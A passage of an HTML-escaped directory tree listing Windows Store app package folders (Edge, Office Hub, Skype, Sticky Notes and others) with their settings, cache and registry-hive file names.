&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; squaretile.png
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; tinytile.png
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; 6501008900
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; squaretile.png
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; tinytile.png
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9492;&#9472;&#9472; 7603651830
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; squaretile.png
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9492;&#9472;&#9472; tinytile.png
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; Settings
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; roaming.lock
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9492;&#9472;&#9472; settings.dat
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Microsoft.MicrosoftEdgeDevToolsClient_8wekyb3d8bbwe
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; Settings
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; roaming.lock
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9492;&#9472;&#9472; settings.dat
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Microsoft.MicrosoftEdge.Stable_8wekyb3d8bbwe
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; Settings
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; roaming.lock
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9492;&#9472;&#9472; settings.dat
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; AC
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; AppCache
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; container.dat
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; L074QDVK
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9492;&#9472;&#9472; container.dat
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; INetCache
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; container.dat
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; MSIMGSIZ.DAT
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; INetCookies
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; ESE
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9492;&#9472;&#9472; container.dat
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; Microsoft
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; CryptnetUrlCache
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Content
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; 57C8EDB95DF3F0AD4EE2DC2B8CFD4157
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; 7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; 77EC63BDA74BD0D0E0426DC8F8008506
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; E2C6CBAF0AF08CF203BA74BF0D0AB6D5_6372E0472AFF76BB926C97818BC773B9
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; FB0D848F74F70BB2EAA93746D24D9749
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; MetaData
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; 57C8EDB95DF3F0AD4EE2DC2B8CFD4157
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; 7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; 77EC63BDA74BD0D0E0426DC8F8008506
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; E2C6CBAF0AF08CF203BA74BF0D0AB6D5_6372E0472AFF76BB926C97818BC773B9
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;     &#9492;&#9472;&#9472; FB0D848F74F70BB2EAA93746D24D9749
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9492;&#9472;&#9472; Internet Explorer
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9492;&#9472;&#9472; DOMStore
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;             &#9500;&#9472;&#9472; container.dat
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;             &#9492;&#9472;&#9472; QCWD23FV
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;                 &#9492;&#9472;&#9472; www.office[1].xml
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Settings
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; roaming.lock
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; settings.dat
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; settings.dat.LOG1
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; settings.dat.LOG2
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; SystemAppData
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9492;&#9472;&#9472; Helium
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; UserClasses.dat
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; UserClasses.dat.LOG1
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; UserClasses.dat.LOG2
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; User.dat
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; User.dat.LOG1
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9492;&#9472;&#9472; User.dat.LOG2
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; Settings
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; roaming.lock
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9492;&#9472;&#9472; settings.dat
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; Settings
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; roaming.lock
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; settings.dat
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; settings.dat.LOG1
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9492;&#9472;&#9472; settings.dat.LOG2
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Microsoft.MixedReality.Portal_8wekyb3d8bbwe
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; Settings
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; roaming.lock
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; settings.dat
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; settings.dat.LOG1
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9492;&#9472;&#9472; settings.dat.LOG2
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Microsoft.MSPaint_8wekyb3d8bbwe
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; Settings
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; roaming.lock
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9492;&#9472;&#9472; settings.dat
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Microsoft.Office.OneNote_8wekyb3d8bbwe
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; Settings
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; roaming.lock
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9492;&#9472;&#9472; settings.dat
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Microsoft.People_8wekyb3d8bbwe
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; Settings
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; roaming.lock
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; settings.dat
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; settings.dat.LOG1
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9492;&#9472;&#9472; settings.dat.LOG2
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Microsoft.ScreenSketch_8wekyb3d8bbwe
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; Settings
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; roaming.lock
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; settings.dat
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; settings.dat.LOG1
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9492;&#9472;&#9472; settings.dat.LOG2
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Microsoft.SkypeApp_kzf8qxf38zg5c
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; LocalState
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; DiagOutputDir
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9492;&#9472;&#9472; SkypeApp0.txt
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; Settings
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; roaming.lock
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; settings.dat
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; settings.dat.LOG1
